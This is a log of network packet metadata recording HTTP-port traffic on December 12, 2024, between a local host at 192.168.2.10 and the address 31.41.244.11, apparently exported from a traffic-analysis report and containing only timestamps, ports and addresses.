Dec 12, 2024 16:48:12.050218105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.050307035 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.051933050 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.052071095 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.052109003 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.052249908 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.053365946 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.053556919 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.053602934 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.053673029 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.054977894 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.055082083 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.055145979 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.055330038 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.056612015 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.056673050 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.056688070 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.056816101 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.058362007 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.058391094 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.058619022 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.058619022 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.059966087 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.060062885 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.060117960 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.060168028 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.061475039 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.061526060 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.061589003 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.061659098 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.063015938 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.063055992 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.063088894 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.063121080 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.064642906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.064816952 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.064837933 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.064909935 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.066263914 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.066318989 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.066351891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.066443920 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.067941904 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.068032026 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.068109035 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.068178892 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.069458961 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.069550991 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.069597960 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.069597960 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.071088076 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.071172953 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.071331024 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.071331024 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.072712898 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.072810888 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.072875977 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.073110104 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.074264050 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.074306965 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.074376106 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.074434042 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.077685118 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.077754974 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.077768087 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.077816963 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.077852011 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.077857971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.077857971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.077990055 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.079123020 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.079174995 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.079255104 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.079336882 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.080774069 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.080810070 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.080832958 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.080918074 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.082355976 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.082432985 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.082515955 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.082762003 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.083952904 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.084009886 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.084151030 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.084238052 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.085536003 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.085608006 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.085632086 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.085771084 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.196988106 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.197010994 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.197149992 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.197649002 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.197719097 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.197772980 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.197858095 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.199034929 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.199064016 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.199281931 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.199281931 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.200479031 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.200535059 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.200572968 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.200620890 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.201919079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.202004910 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.202007055 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.202275038 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.203176975 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.203246117 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.203346014 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.203346014 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.204688072 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.204814911 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.204844952 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.205049038 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.205936909 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.205991030 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.206010103 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.206052065 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.207289934 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.207349062 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.207389116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.207442045 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.208666086 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.208755970 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.208867073 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.208867073 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.209899902 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.209968090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.210103989 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.210174084 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.211489916 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.211559057 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.211680889 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.211752892 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.213130951 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.213193893 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.213210106 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.213262081 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.214210987 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.214255095 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.214282036 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.214309931 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.215250015 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.215338945 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.215390921 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.215519905 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.216351986 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.216453075 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.216547012 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.216830969 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.217770100 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.217860937 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.217992067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.217992067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.218911886 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.218965054 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.219067097 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.219067097 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.220237970 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.220316887 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.220354080 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.220354080 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.221545935 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.221618891 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.221636057 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.221688986 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.222892046 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.222955942 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.223068953 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.223068953 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.224195957 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.224256039 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.224263906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.224483967 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.225421906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.225552082 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.225573063 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.225640059 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.226722002 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.226780891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.226866961 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.226950884 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.228043079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.228105068 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.228213072 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.228610992 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.229321957 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.229465008 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.229480028 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.229564905 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.230590105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.230724096 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.230871916 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.230871916 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.231904984 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.231995106 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.232276917 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.232276917 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.233247995 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.233433962 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.234148979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.234148979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.234500885 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.234602928 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.234802961 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.234802961 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.235781908 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.235868931 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.235938072 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.235938072 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.237108946 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.237227917 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.237308979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.237308979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.238379955 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.238456964 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.238514900 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.238648891 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.239805937 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.239948034 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.240221024 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.240221024 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.240942955 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.240987062 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.241056919 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.241056919 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.242284060 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.242371082 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.242433071 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.242433071 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.243554115 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.243662119 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.243699074 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.243732929 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.244904995 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.245043993 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.245078087 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.245356083 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.246166945 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.246251106 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.246289968 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.246464014 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.247469902 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.247534990 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.247728109 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.247983932 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.248750925 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.248866081 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.249486923 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.249486923 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.250036001 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.250066042 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.250372887 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.250372887 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.251307964 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.251386881 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.251401901 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.251482010 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.252597094 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.252702951 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.252717018 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.252859116 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.253906965 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.254009962 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.254683971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.254683971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.255197048 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.255332947 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.255357027 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.255562067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.256498098 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.256582975 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.256731033 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.256731033 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.257810116 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.257926941 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.258338928 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.258338928 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.259105921 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.259162903 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.259176970 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.259226084 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.260368109 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.260562897 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.260678053 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.260678053 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.261667967 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.261743069 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.261765957 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.261806965 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.262995005 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.263076067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.263118982 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.263175964 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.264379025 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.264476061 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.264501095 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.264578104 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.265577078 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.265717983 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.389272928 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.389362097 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.389375925 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.389462948 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.389837027 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.389890909 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.389925957 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.391033888 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.391176939 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.391218901 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.391218901 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.391218901 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.392234087 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.392292023 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.392340899 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.392430067 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.393407106 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.393517017 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.393532991 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.393672943 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.394596100 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.394686937 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.394721985 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.394774914 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.395863056 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.395905018 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.395925045 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.395970106 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.396908998 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.397023916 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.397047043 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.397247076 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.398111105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.398309946 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.398319960 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.399092913 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.399291039 CET	80	49858	31.41.244.11	192.168.2.10
